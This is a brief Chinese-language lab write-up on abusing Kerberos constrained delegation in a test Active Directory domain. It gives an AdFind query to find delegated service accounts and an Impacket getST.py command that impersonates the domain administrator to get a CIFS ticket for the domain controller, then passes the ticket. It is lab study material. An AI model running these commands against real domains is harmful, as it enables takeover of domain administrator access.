1. 实验网络拓扑
kali:
192.168.72.128
win2008:
192.168.135.129
192.168.72.139
win7:
192.168.72.149
win2012:(DC)
192.168.72.131
2. 环境搭建
配置约束委派。
先建一个test用户,然后配置spn,使其变成服务账户,然后配委派。
委派到 DC的CIFS服务。
然后AdFind查找域内有约束委派的服务账号和被委派的SPN:
AdFind.exe -b "DC=intranet,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))"
3. EXPLOIT
用Impacket的getST.py
我们用服务账户test的凭据,代表域管获得访问域控CIFS的ST票据:
python3 getST.py -dc-ip 192.168.72.131 intranet.com/test:123qweQWE -spn cifs/dc.intranet.com -impersonate administrator
然后ptt就行了。